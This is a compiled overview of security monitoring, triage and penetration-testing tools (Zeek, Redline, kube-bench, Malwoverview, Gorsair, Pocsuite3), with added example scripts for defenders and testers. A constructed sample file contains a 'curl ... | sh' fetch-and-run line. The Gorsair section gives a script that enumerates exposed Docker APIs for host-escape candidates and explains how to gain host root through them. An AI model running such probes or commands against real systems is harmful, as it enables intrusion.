A powerful framework for network traffic analysis and security monitoring. Bro is a passive, open-source network traffic analyzer. It is
primarily a security monitor that inspects all traffic on a link in
depth for signs of suspicious activity. More generally, however,
Bro supports a wide range of traffic analysis tasks even outside of
the security domain, including performance measurements and helping
with trouble-shooting.
Note that "Zeek" is the
new name of what used to be known as the "Bro" network security monitoring system.
Key Features
In-depth Analysis
Zeek ships with analyzers for many protocols, enabling high-level semantic
analysis at the application layer.
Adaptable and Flexible
Zeek's domain-specific scripting language enables site-specific monitoring
policies and means that it is not restricted to any particular detection
approach.
Efficient
Zeek targets high-performance networks and is used operationally at a variety
of large sites.
Highly Stateful
Zeek keeps extensive application-layer state about the network it monitors
and provides a high-level archive of a network's activity.
Two of the best tools for triage analysis once a system is suspected of compromise:
Redline - FireEye
CrowdResponse - CrowdStrike
Redline:
FireEye's premier free endpoint security tool, provides
host investigative capabilities to users to find signs of malicious
activity through memory and file analysis and the development of a
threat assessment profile.
With Redline, you can:
Thoroughly audit and collect all running processes and drivers
from memory, file-system metadata, registry data, event logs,
network information, services, tasks and web history.
Analyze and view imported audit data, including the ability to
filter results around a given timeframe using Redline’s Timeline
functionality with the TimeWrinkle™ and TimeCrunch™ features.
Streamline memory analysis with a proven workflow for analyzing
malware based on relative priority.
Perform Indicators of
Compromise (IOC) analysis. Supplied with a set of IOCs, the Redline
Portable Agent is automatically configured to gather the data
required to perform the IOC analysis and an IOC hit result
review.
Redline version 1.20.2 introduces support for large file and
registry audits. Redline has also been improved to address issues
related to efficiency and memory management.
Supported Operating Systems: Windows XP, Windows Vista,
Windows 7, Windows 8 (32-bit and 64-bit), Windows 10
CrowdResponse:
There is no installer for this tool. Simply unzip the contents of the
downloaded ZIP file into a location of your choosing and launch it
directly from there. Similarly for uninstalling: simply delete the
file(s) you extracted by moving them to the Recycle Bin or permanently
deleting them. A very small number of elements may remain in the
Registry. These can be safely ignored or manually deleted with a
registry editing tool (e.g. regedit): navigate to HKEY_LOCAL_MACHINE\Software\CrowdStrike or HKEY_CURRENT_USER\Software\CrowdStrike, find the key named after the tool and remove that branch.
The Microsoft Malicious Software Removal Tool (MSRT) helps keep Windows
computers free from prevalent malware. MSRT finds and removes threats
and reverses the changes made by these threats. MSRT is generally
released monthly as part of Windows Update or as a standalone tool
available here for download.
Use this tool:
If you have automatic updates for Windows turned off (when they are on, Windows Update already downloads and runs MSRT in the background).
If you suspect an infection from prevalent malware families.
Microsoft Safety Scanner is a scan tool designed to find and remove
malware from Windows computers. Simply download it and run a scan to
find malware and try to reverse changes made by identified threats.
Safety Scanner only scans when manually triggered and is available for
use 10 days after being downloaded. We recommend that you always
download the latest version of this tool before each scan.
kube-hunter is an open-source tool that hunts for security issues in
your Kubernetes clusters. It’s designed to increase awareness and
visibility of the security controls in Kubernetes environments.
kube-hunter is available as a container (aquasec/kube-hunter), and we also offer a web site at kube-hunter.aquasec.com
where you can register online to receive a token allowing you see and
share the results online. You can also run the Python code yourself as
described below.
kube-bench is a Go application that checks whether Kubernetes is deployed securely by running the checks documented in the CIS Kubernetes Benchmark.
"An objective, consensus-driven security guideline for the Kubernetes Server Software."
Note that it is impossible to inspect the master nodes of managed
clusters, e.g. GKE, EKS and AKS, using kube-bench as one does not have
access to such nodes, although it is still possible to use kube-bench to
check worker node configuration in these environments.
Tests are configured with YAML files, making this tool easy to update as test specifications evolve.
CIS Kubernetes Benchmark support
kube-bench supports the tests for Kubernetes as defined in CIS Benchmarks 1.0.0 to 1.4.0:
CIS Kubernetes Benchmark | kube-bench config | Kubernetes versions
1.0.0                    | 1.6               | 1.6
1.1.0                    | 1.7               | 1.7
1.2.0                    | 1.8               | 1.8-1.10
1.3.0                    | 1.11              | 1.11-1.12
1.4.0                    | 1.13              | 1.13-
By default kube-bench will determine the test set to run based on the Kubernetes version running on the machine.
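Once kube-bench has run, the useful output is the list of failed checks and their remediation, not the pass/fail totals. The script below is an added example, not kube-bench's own code: it reads the JSON that kube-bench's --json flag emits and pulls out the scored failures. The field names it expects ("tests", "results", "test_number", "test_desc", "status", "remediation", "scored", and the newer {"Controls": [...]} wrapper) are an assumption based on kube-bench's output format, so check them against the release you run; SAMPLE is constructed, not captured from a real cluster.

```python
"""Triage kube-bench --json output: list failing checks with their remediation.

Added example, not kube-bench's own code. It assumes the JSON layout that
kube-bench's --json flag emits: a control group with "tests" -> "results",
each result carrying "test_number", "test_desc", "status" and "remediation"
(newer releases wrap the groups in {"Controls": [...]}, handled below).
Check the field names against the release you run. SAMPLE is constructed.
"""
import json
from typing import Dict, List

SAMPLE = json.dumps({
    "id": "1", "version": "1.13", "text": "Master Node Security Configuration",
    "node_type": "master",
    "tests": [
        {"section": "1.1", "desc": "API Server", "results": [
            {"test_number": "1.1.1", "status": "FAIL", "scored": True,
             "test_desc": "Ensure that the --anonymous-auth argument is set to false (Scored)",
             "remediation": "Edit the API server pod specification and set --anonymous-auth=false."},
            {"test_number": "1.1.2", "status": "PASS", "scored": True,
             "test_desc": "Ensure that the --basic-auth-file argument is not set (Scored)",
             "remediation": "Remove the --basic-auth-file parameter."},
            {"test_number": "1.1.3", "status": "WARN", "scored": False,
             "test_desc": "Ensure that the --audit-log-path argument is set (Not Scored)",
             "remediation": "Set --audit-log-path to a file on the host."},
        ]},
        {"section": "1.4", "desc": "Configuration Files", "results": [
            {"test_number": "1.4.1", "status": "FAIL", "scored": True,
             "test_desc": "Ensure that the API server pod specification file permissions are 644 or more restrictive (Scored)",
             "remediation": "chmod 644 /etc/kubernetes/manifests/kube-apiserver.yaml"},
        ]},
    ],
})
SAMPLE_WRAPPED = json.dumps({"Controls": [json.loads(SAMPLE)]})  # newer output shape


def load_controls(text: str) -> List[dict]:
    """Accept a single control group, a list of groups, or {"Controls": [...]}."""
    data = json.loads(text)
    if isinstance(data, dict) and "Controls" in data:
        return data["Controls"]
    return data if isinstance(data, list) else [data]


def _results(controls):
    for group in controls:
        for test in group.get("tests", []):
            for r in test.get("results", []):
                yield group, test, r


def count_by_status(controls) -> Dict[str, int]:
    """Recount from the individual results rather than trusting total_* fields."""
    counts = {"PASS": 0, "FAIL": 0, "WARN": 0, "INFO": 0}
    for _, _, r in _results(controls):
        status = r.get("status", "INFO")
        counts[status] = counts.get(status, 0) + 1
    return counts


def failing_checks(controls, include_warn=False, scored_only=True) -> List[dict]:
    """FAIL (optionally WARN) results, scored ones by default, sorted by test id."""
    wanted = {"FAIL", "WARN"} if include_warn else {"FAIL"}
    out = []
    for group, test, r in _results(controls):
        if r.get("status") not in wanted:
            continue
        if scored_only and not r.get("scored", True):
            continue
        out.append({
            "id": r["test_number"],
            "node_type": group.get("node_type"),
            "section": test.get("section"),
            "status": r["status"],
            "desc": r["test_desc"],
            "remediation": (r.get("remediation") or "").strip(),
        })
    return sorted(out, key=lambda f: [int(p) for p in f["id"].split(".")])


if __name__ == "__main__":
    controls = load_controls(SAMPLE)
    print("summary:", count_by_status(controls))
    for f in failing_checks(controls, include_warn=True, scored_only=False):
        print(f"[{f['status']}] {f['id']} ({f['node_type']}) {f['desc']}\n    fix: {f['remediation']}")
```

In practice you would pipe the real report in (kube-bench ... --json > report.json) and call load_controls on that file; the recount in count_by_status matters because once you filter to scored checks the daemon's own totals no longer describe what you are looking at.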
Malware analysis tools: developed to provide students with comprehensive hands-on exposure to the processes, tools and procedures used to identify common types of malware and to quickly determine their capabilities and threat level.
The new 1.6.0 version of MALWOVERVIEW tool is finally available!
Malwoverview.py is a first response tool to perform an initial and quick triage on either a directory containing malware samples, specific malware sample or even a suspect URL.
https://github.com/alexandreborges/malwoverview
This version:
* Uses the Hybrid Analysis API version 2.4.0.
* Includes certificate information in the Hybrid Analysis report.
* Includes MITRE information in the Hybrid Analysis report.
* Includes an option to download samples from Hybrid Analysis.
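The local half of the triage Malwoverview describes (hashing a directory of samples and working out what each file actually is before any sandbox lookup) is short enough to show in full. The script below is an added example, not Malwoverview's code: it reads bytes only, identifies files by magic rather than by their attacker-chosen extension, and collapses renamed duplicates so each hash is looked up once. build_sample_dir() writes constructed stand-ins into a temp directory; no real malware is involved.

```python
"""Offline first-pass triage of a directory of suspect files.

Added example, not Malwoverview's code: it covers the local part of a triage
(hashes, file type from magic bytes, duplicates) that precedes any lookup
against a sandbox API. Nothing here executes or parses the samples beyond
reading their bytes. build_sample_dir() writes constructed stand-ins for
samples into a temp directory; no real malware is involved.
"""
import hashlib
import os
import tempfile
from typing import Dict, List

# Simple prefix signatures; PE needs a two-stage check done in classify().
PREFIXES = [
    (b"\x7fELF", "elf"),
    (b"%PDF-", "pdf"),
    (b"PK\x03\x04", "zip (also docx/xlsx/jar/apk)"),
    (b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1", "ole2 (legacy office / msi)"),
    (b"Rar!\x1a\x07", "rar"),
    (b"#!", "script"),
]


def classify(data: bytes) -> str:
    """Identify a file by magic bytes, never by its extension, which the attacker chose."""
    if data[:2] == b"MZ":
        # e_lfanew at 0x3c points at the "PE\0\0" signature in a real PE
        if len(data) >= 0x40:
            e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
            if data[e_lfanew:e_lfanew + 4] == b"PE\0\0":
                return "pe"
        return "mz (dos stub only / truncated pe)"
    for magic, label in PREFIXES:
        if data.startswith(magic):
            return label
    return "unknown"


def triage_file(path: str) -> Dict:
    with open(path, "rb") as fh:
        data = fh.read()
    return {
        "name": os.path.basename(path),
        "size": len(data),
        "type": classify(data),
        "md5": hashlib.md5(data).hexdigest(),       # still what most sandboxes key on
        "sha256": hashlib.sha256(data).hexdigest(),
    }


def triage_dir(directory: str) -> List[Dict]:
    return [triage_file(os.path.join(directory, n))
            for n in sorted(os.listdir(directory))
            if os.path.isfile(os.path.join(directory, n))]


def unique_by_hash(rows: List[Dict]) -> List[Dict]:
    """Collapse renamed copies of the same sample so each hash is looked up once."""
    seen, out = set(), []
    for r in rows:
        if r["sha256"] not in seen:
            seen.add(r["sha256"])
            out.append(r)
    return out


def make_pe() -> bytes:
    """Smallest byte string classify() accepts as PE: MZ header, e_lfanew=0x40, PE signature."""
    return b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 20


def build_sample_dir() -> str:
    """Constructed stand-ins (not malware) so the triage can be run offline."""
    d = tempfile.mkdtemp(prefix="triage_")
    files = {
        "invoice.pdf.exe": make_pe(),
        "update.bin": make_pe(),                          # same bytes, different name
        "dropper": b"\x7fELF\x02\x01\x01" + b"\0" * 40,
        "macro.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\0" * 40,
        "run.sh": b"#!/bin/sh\ncurl http://example.invalid | sh\n",
        "notes.txt": b"nothing to see here\n",
    }
    for name, data in files.items():
        with open(os.path.join(d, name), "wb") as fh:
            fh.write(data)
    return d


if __name__ == "__main__":
    rows = triage_dir(build_sample_dir())
    for r in unique_by_hash(rows):
        print(f"{r['sha256'][:16]}  {r['size']:6d}  {r['type']:<28} {r['name']}")
```

Point triage_dir at a real sample directory on an isolated analysis box; the sha256 column is what you then feed to Malwoverview or the Hybrid Analysis API, and the type column tells you which samples are worth a full sandbox run first.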
Gorsair is a penetration testing tool for discovering and remotely
accessing Docker APIs from vulnerable Docker containers. Once it has
access to the docker daemon, you can use Gorsair to directly execute
commands on remote containers.
Gorsair hacks its way into remote docker containers that expose their APIs.
Exposing the docker API on the internet is a tremendous risk, as it
can let malicious agents get information on all of the other containers,
images and system, as well as potentially getting privileged access to
the whole system if the image uses the root user.
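To see concretely what that exposure hands out, the script below is an added example (not Gorsair's code) that does the read-only part of what Gorsair automates: it talks to the documented Docker Engine HTTP API on port 2375 (GET /version, /containers/json, /containers/{id}/json), which needs no credentials when the daemon is bound to a TCP socket without TLS, and reduces the answers to the facts that matter: which containers run as root, and which already have a host escape path (privileged, or host root / the daemon socket bind-mounted in). VERSION_SAMPLE and INSPECT_SAMPLE are constructed documents so assess() can be run offline; the network side is probe().

```python
"""What an unauthenticated Docker Engine API hands out, and why it matters.

Added example, not Gorsair's code. probe() speaks the documented Docker
Engine HTTP API (GET /version, /containers/json, /containers/{id}/json) over
plain TCP, which is exactly the exposure described above: no credentials
are needed. assess() is pure so it can be run on the constructed documents
below (VERSION_SAMPLE and INSPECT_SAMPLE are made up, not captured).
"""
import json
import urllib.request
from typing import Dict, List, Optional

VERSION_SAMPLE = {"Version": "19.03.8", "ApiVersion": "1.40", "Os": "linux", "Arch": "amd64"}
INSPECT_SAMPLE = [
    {"Id": "a1" * 32, "Name": "/web", "State": {"Running": True},
     "Config": {"Image": "nginx:1.17", "User": ""},
     "HostConfig": {"Privileged": False, "PidMode": "", "Binds": None}},
    {"Id": "b2" * 32, "Name": "/agent", "State": {"Running": True},
     "Config": {"Image": "internal/agent:3", "User": "1000:1000"},
     "HostConfig": {"Privileged": True, "PidMode": "host", "Binds": ["/:/host:ro"]}},
]

ESCAPE_BINDS = ("/:", "/var/run/docker.sock:")  # host root or the daemon socket mounted in


def fetch_json(base: str, path: str, timeout: float = 3.0):
    with urllib.request.urlopen(base + path, timeout=timeout) as resp:
        return json.load(resp)


def probe(host: str, port: int = 2375) -> Optional[Dict]:
    """Return assess() output if host:port answers the Docker API, else None."""
    base = f"http://{host}:{port}"
    try:
        version = fetch_json(base, "/version")
        containers = fetch_json(base, "/containers/json?all=1")
        inspected = [fetch_json(base, f"/containers/{c['Id']}/json") for c in containers]
    except (OSError, ValueError, KeyError, TypeError):
        return None
    return assess(version, inspected)


def assess(version: Dict, inspected: List[Dict]) -> Dict:
    """Reduce raw inspect documents to what an attacker or auditor cares about."""
    findings = []
    for c in inspected:
        cfg, hc = c.get("Config") or {}, c.get("HostConfig") or {}
        binds = hc.get("Binds") or []
        privileged = bool(hc.get("Privileged"))
        findings.append({
            "name": (c.get("Name") or "").lstrip("/"),
            "image": cfg.get("Image"),
            "running": bool((c.get("State") or {}).get("Running")),
            "user": cfg.get("User") or "root",     # empty User means the daemon default: root
            "privileged": privileged,
            "host_pid": hc.get("PidMode") == "host",
            "binds": binds,
            "escape_path": privileged or any(b.startswith(ESCAPE_BINDS) for b in binds),
        })
    return {
        "daemon": f"Docker {version.get('Version')} (API {version.get('ApiVersion')}, "
                  f"{version.get('Os')}/{version.get('Arch')})",
        "containers": findings,
        "root_containers": [f["name"] for f in findings if f["user"] == "root"],
        "escape_candidates": [f["name"] for f in findings if f["escape_path"]],
    }


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:  # python3 probe.py 192.168.1.72 [2375]
        report = probe(sys.argv[1], int(sys.argv[2]) if len(sys.argv) > 2 else 2375)
        print(json.dumps(report, indent=2) if report else "no Docker API answered")
    else:
        print(json.dumps(assess(VERSION_SAMPLE, INSPECT_SAMPLE), indent=2))
```

Two caveats a practitioner should keep in mind. First, the state of the existing containers is only the start: the same unauthenticated API accepts POST /containers/create, so an attacker can start a fresh container with the host root bind-mounted and become root on the host even when every existing container is unprivileged; the exposure itself is the finding. Second, the fix is not a firewall rule alone: keep the daemon on its Unix socket, and if remote access is genuinely needed, enable TLS with client-certificate verification on 2376 rather than plain HTTP on 2375.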
Install
From a release
Set the following variables:
GORSAIR_VERSION to whatever release you are interested in
OS to your operating system (linux, windows or darwin)
ARCH to your architecture (amd64, arm, or ppc64le)
Then run the following command to install gorsair (the release URL redirects, so curl needs -L; the variable names must be braced so the shell does not read $OS_ as a single variable; and the downloaded binary needs the execute bit):
curl -L "https://github.com/Ullaakut/Gorsair/releases/download/${GORSAIR_VERSION}/gorsair_${OS}_${ARCH}" --output /usr/local/bin/gorsair && chmod +x /usr/local/bin/gorsair
From the sources
Make sure that you have a Go version that supports modules (1.11 and above)
Make sure that your environment has the GO111MODULE variable set to on
Run go build -o /usr/local/bin/gorsair cmd/*.go from the root of the repository
Command line options
-t, --targets: Set targets according to the nmap target format. Required. Example: --targets="192.168.1.72,192.168.1.74"
-p, --ports: (Default: 2375,2376) Set custom ports.
-s, --speed: (Default: 4)
Set custom nmap discovery presets to improve speed or accuracy. It's
recommended to lower it if you are attempting to scan an unstable and
slow network, or to increase it if on a very performant and reliable
network. You might also want to keep it low to keep your discovery
stealthy. See this for more info on the nmap timing templates.
Pocsuite3 is an open-source remote vulnerability testing and proof-of-concept development framework developed by the Knownsec 404 Team.
It comes with a powerful proof-of-concept engine and many niche features
for penetration testers and security researchers.
Features
PoC scripts can run in `attack`, `verify` or `shell` mode, each behaving differently
Plugin ecosystem
Dynamic loading of PoC scripts from anywhere (local file, Redis, database, Seebug ...)
Loading of multiple targets from anywhere (CIDR, local file, Redis, database, ZoomEye ...)
Results can be easily exported
Dynamic patching and hooking of requests
Usable both as a command line tool and as an importable Python package
IPv6 support
Global HTTP/HTTPS/SOCKS proxy support
Simple spider API for PoC scripts to use
Integration with [Seebug](https://www.seebug.org) (to load PoCs from the Seebug website)
Integration with [ZoomEye](https://www.zoomeye.org) (to load targets from a ZoomEye `Dork`)
Integration with [Ceye](http://ceye.io/) (to verify blind DNS and HTTP requests)
More ...
Functions
Vulnerability Testing Framework
Written in Python and supporting two plugin-invoked modes, validation
and exploitation, Pocsuite can import batch targets from files and
test those targets against multiple exploit plugins in one run. (See "Pocsuite usage")
PoC/Exp Development Kit
Like Metasploit, it is a development kit for pentesters to develop
their own exploits. Based on Pocsuite, you can write just the core code
of a PoC/Exp without caring about result output and the like. Several
hundred people have written PoC/Exp scripts on top of Pocsuite to
date.
Integratable Module
Users can use the auxiliary modules packaged with Pocsuite to extend
their exploits, or integrate Pocsuite into other vulnerability
assessment tools of their own.
Integrated ZoomEye And Seebug APIs
Pocsuite is also an extremely useful way to use the Seebug and ZoomEye
APIs together: vulnerability assessment can be done automatically and
effectively by searching for targets through ZoomEye and acquiring
PoC scripts from Seebug or locally.
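What "write the core code of a PoC without caring about result output" looks like in practice is a PoC class with the three mode hooks and a parse_output that hands evidence to pocsuite3's Output object. The file below is an added example, not pocsuite3's own code. The check in looks_vulnerable() is a labelled placeholder (a made-up marker header or body string, not a real product indicator) that you replace with the real test for the issue you are modelling; the metadata attributes follow the pocsuite3 PoC template, and the stand-in classes in the except branch are an assumption that lets the file import and the pure check run where pocsuite3 is not installed.

```python
"""Minimal pocsuite3 PoC showing how verify / attack / shell modes are wired.

Added example, not pocsuite3's own code. The check in looks_vulnerable() is
a labelled placeholder (a made-up marker header or body string); swap in the
real test for the issue you are modelling. The metadata fields follow the
pocsuite3 PoC template; the stand-in classes in the except branch are an
assumption for running without pocsuite3 installed.
"""
try:
    from pocsuite3.api import Output, POCBase, register_poc, requests
except ImportError:
    # Assumption: pocsuite3 is absent here. These stand-ins mirror only the
    # attributes this file touches so the module still imports and the pure
    # check can be exercised; under pocsuite3 the real classes are used.
    requests = None

    class POCBase:
        url = ""

    class Output:
        def __init__(self, poc):
            self.status, self.result = None, {}

        def success(self, result):
            self.status, self.result = "success", result

        def fail(self, msg):
            self.status, self.result = "fail", {"error": msg}

    def register_poc(cls):
        return cls

MARKER = "x-demo-vulnerable"          # placeholder indicator, not a real product header


def looks_vulnerable(status_code: int, headers: dict, body: str) -> dict:
    """Pure check, testable without a network. Returns the evidence that goes
    into result['VerifyInfo'], or {} when the target looks clean."""
    if status_code != 200:
        return {}
    lowered = {k.lower(): v for k, v in (headers or {}).items()}
    if MARKER in lowered:
        return {"Header": f"{MARKER}: {lowered[MARKER]}"}
    if MARKER in (body or "").lower():
        return {"Body": "marker string present"}
    return {}


class DemoPOC(POCBase):
    vulID = "0"                      # Seebug id; 0 for an unpublished issue
    version = "1"
    author = ["added example"]
    vulDate = "2019-01-01"
    createDate = "2019-01-01"
    updateDate = "2019-01-01"
    references = []
    name = "Demo marker check (placeholder)"
    appPowerLink = ""
    appName = "demo-app"
    appVersion = "all"
    vulType = "Information Disclosure"
    desc = "Placeholder PoC: reports the target as affected when the demo marker is present."
    samples = []
    install_requires = []

    def _verify(self):
        # self.url is the normalised target pocsuite3 hands to the PoC
        r = requests.get(self.url, timeout=10)
        evidence = looks_vulnerable(r.status_code, dict(r.headers), r.text)
        result = {"VerifyInfo": {"URL": self.url, **evidence}} if evidence else {}
        return self.parse_output(result)

    def _attack(self):
        # a disclosure check has no separate exploitation step; reuse verify
        return self._verify()

    def _shell(self):
        # nothing to spawn a shell with here; still answer so --shell reports cleanly
        return self._verify()

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("target is not vulnerable")
        return output


register_poc(DemoPOC)
```

Save it as demo_poc.py and run it through the framework with pocsuite -r demo_poc.py -u http://target --verify (or --attack / --shell); pocsuite3 takes care of target loading, threading, proxies and the result table, which is the point of keeping the check itself a small pure function.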
Installation
pocsuite3 works out of the box with Python version 3.x on any platform.
You can use Git to clone the latest source code repository
$ git clone git@github.com:knownsec/pocsuite3.git
Or click here to download the latest source zip package, and extract